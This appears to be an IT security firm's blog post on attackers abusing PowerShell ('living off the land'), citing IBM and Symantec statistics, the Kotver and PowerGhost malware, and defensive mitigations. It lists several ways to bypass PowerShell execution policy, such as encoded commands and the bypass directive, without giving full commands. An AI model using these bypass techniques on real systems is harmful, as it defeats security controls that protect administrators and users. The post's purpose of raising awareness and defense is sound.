More than Half of Cyberattacks Exploit Tools that Already Exist on Targeted Computers, Study Shows

A study conducted by IBM showed that more than half of cyberattacks exploit common administration tools or tools that already exist on targeted computers.

IBM’s 2019 X-Force Threat Intelligence Indexshowed that more than half or 57% of cyberattacks leveraged common administration tools and in the process, evading detection, maintaining persistence and achieving their objectives.

Living Off the Land

The phrase “living off the land” is the term used for cyberattacks that leverage tools that already exist on targeted computers. This type of cyberattack blends in with common administration work, making detection more difficult. According to IBM, one of the common administration tools that’s often used by cyberattackers is PowerShell.

What Is PowerShell?

PowerShell is a more than 10-year-old computer framework, whose legitimate function is to aid system administrators to automate tasks and manage a system remotely, that is, regardless of the location of system administrators.

Microsoft started using PowerShell in 2005. This framework is installed on all Windows computers by default. In 2016, this framework became open source and has become available for non-Windows platforms.

“Increasing awareness of cybersecurity issues and stricter security controls are making it harder for cybercriminals to establish footholds on target systems,” IBM said. “As a result, the use of malicious software in attacks appears to be on the decline. More than half (57 percent) of attacks analyzed by X-Force in 2018, did not leverage malware and many involved the use of non-malicious tools including PowerShell … to evade detection.”

In addition to the above-mentioned functions of PowerShell, the function of this framework extends to nearly every system administrator’s task, such as network sniffingto reading out passwords. On the flip side, IBM said these legitimate functions of PowerShell allowed attackers to “gather credentials, and then leveraged it to conduct network reconnaissance and data theft.”

Many cyberattacks using PowerShell use this tool as downloader. The Trojan.Kotveris one example of a malicious software (malware) that abuses PowerShell. Once Kotver gets inside a computer, it checks if Windows PowerShell is installed. In case PowerShell isn’t installed, this Kotver downloads PowerShell on the compromised malware. Kotver then performs click-fraud operations by secretly downloading large numbers of online advertisements into the compromised computer and then automatically clicking said online advertisements with a view of earning fraudulent advertising revenue for the attacker.

PowerGhostis another malware that abuses PowerShell. This malware is capable of performing illicit cryptocurrency mining on compromised servers or workstations as well as conduct distributed denial of service (DDoS) attacks. During the infection process, PowerGhost uses a one-line PowerShell script that runs and downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module.

According to Symantec, the preinstalled Windows PowerShell is one of the most popular choices in cybercriminals’ arsenals. Symantec said that from the second half of 2017 to the first half of 2018, it observed an increase of 661% in computers where malicious PowerShell activity was blocked.

Here are the top reasons why PowerShell is one of the most popular tools used to carry out cyberattacks:

• It’s installed by default on Windows computers.
• It can execute payloads directly from memory, thus enhancing obfuscation and evading traditional security controls designed to detect malware deployments.
• It has remote access capabilities by default with encrypted traffic.
• Cyber defenders often overlook PowerShell when hardening their systems.
• PowerShell can bypass application-whitelisting tools depending on the configuration.
• PowerShell has a growing community with readily available scripts.
• Many system administrators use and trust PowerShell, allowing abuses of PowerShell to blend in with regular administration work.

By default, Microsoftrestricts the use of PowerShell scripts with execution policies. A computer user has 5 PowerShell options: Restricted, AllSigned, RemoteSigned, Unrestricted and Bypass. Cyberattackers have found a number of ways to bypass Microsoft’s execution policy. Here are some methods to bypass Microsoft’s execution policy as compiled by Symantec:

• Pipe the script into the standard-in of powershell.exe, such as with the echo or type command.
• Use the command argument to execute a single command.
• Use the EncodedCommand argument to execute a single Base64-encoded command.
• Use the execution policy directive and pass either “bypass” or “unrestricted” as argument.

Prevention

Whenever cyber attackers launch an attack by abusing PowerShell, they’ve first to execute code on the targeted computer. The cause of initial infection is often similar to typical cyberattacks, including phishing attacks.

Cybersecurity best practices that prevent phishing attacks, therefore, apply to attacks arising from PowerShell abuses. These include deleting any suspicious emails, especially those containing suspicious links and/or attachments, and avoiding enabling macros in Microsoft Office.

Specific to PowerShell threats, here are some mitigating measures:

1. Disable PowerShell if it serves no purpose at all in your organization.
2. If the use of PowerShell can’t be avoided, monitor this framework for any unusual use of powershell.exe and wsmprovhost.exe, especially from unknown locations, unknown users or at suspicious times.
3. Use the latest version of PowerShell. The latest version typically has improved security features.
4. In the execution policy, all internal legitimately used PowerShell scripts should be signed, while unsigned PowerShell scripts should be blocked. Even though there are simple ways to bypass the execution policy, enabling this execution policy provides an extra barrier that attackers have to overcome. In any case, attempts to bypass the execution policy should be monitored and the security loopholes should be fixed.

When you need help managing your servers and mission critical information security, our IT and security experts are a phone call away. Contact us todayor call (416) 920-3000